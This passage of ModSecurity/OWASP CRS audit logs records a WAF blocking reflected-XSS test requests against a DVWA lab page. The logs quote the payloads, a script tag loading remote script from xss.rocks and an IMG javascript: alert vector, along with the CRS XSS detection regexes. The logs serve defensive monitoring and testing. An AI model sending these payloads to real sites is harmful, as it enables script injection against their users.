[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <SCRIPT found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 23)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 23 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT SRC=http://xss.rocks/xss.js> found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <SCRIPT found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 23)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 23 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":637,"p2":4001,"p3":0,"p4":0,"p5":233,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:28:45 --0400","transaction_id":"WRc0PX8AAQEAAAkYuE4AAAAD","remote_address":"192.168.75.145","remote_port":56778,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"192\"] [id \"941140\"] [rev \"3\"] [msg \"XSS Filter - Category 4: Javascript URI Vector\"] [data \"Matched Data: =\\x22javascript: found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <IMG found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"300\"] [id \"941170\"] [rev \"3\"] [msg \"NoScript XSS InjectionChecker: Attribute Injection\"] [data \"Matched Data: \\x22javascript:alert( found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i:(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\\\\t]|(&((#x?0*(9|(13)|( ...\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"428\"] [id \"941210\"] [rev \"3\"] [msg \"IE XSS Filters - Attack Detected.\"] [data \"Matched Data: javascript:a found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 33)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=30,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): IE XSS Filters - Attack Detected.\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\\\\\\\\\\\\\b[^>]*?>[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?|(?:=|U\\\\\\\\\\\\\\\\s*?R\\\\\\\\\\\\\\\\s*?L\\\\\\\\\\\\\\\\s*?\\\\\\\\\\\\\\\\()\\\\\\\\\\\\\\\\s*?[^>]*?\\\\\\\\\\\\\\\\s*?S\\\\\\\\\\\\\\\\s*?C\\\\\\\\\\\\\\\\s*?R\\\\\\\\\\\\\\\\s*?I\\\\\\\\\\\\\\\\s*?P\\\\\\\\\\\\\\\\s*?T\\\\\\\\\\\\\\\\s*?:)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"192\"] [id \"941140\"] [rev \"3\"] [msg \"XSS Filter - Category 4: Javascript URI Vector\"] [data \"Matched Data: =\\\\\\\\x22javascript: found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <IMG found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?i)(?:\\\\\\\\\\\\\\\\W|^)(?:javascript:(?:[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]+[=\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\.<]|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?(?:\\\\\\\\\\\\\\\\bname\\\\\\\\\\\\\\\\b|\\\\\\\\\\\\\\\\[ux]\\\\\\\\\\\\\\\\d))|data:(?:(?:[a-z]\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\\/\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\w+-]+\\\\\\\\\\\\\\\\w)?[;,]|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?;[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?\\\\\\\\\\\\\\\\b(?:base64|charset=)|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?,[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?<[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?>))|@\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*? ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"300\"] [id \"941170\"] [rev \"3\"] [msg \"NoScript XSS InjectionChecker: Attribute Injection\"] [data \"Matched Data: \\\\\\\\x22javascript:alert( found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?i:(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|( ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"428\"] [id \"941210\"] [rev \"3\"] [msg \"IE XSS Filters - Attack Detected.\"] [data \"Matched Data: javascript:a found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] 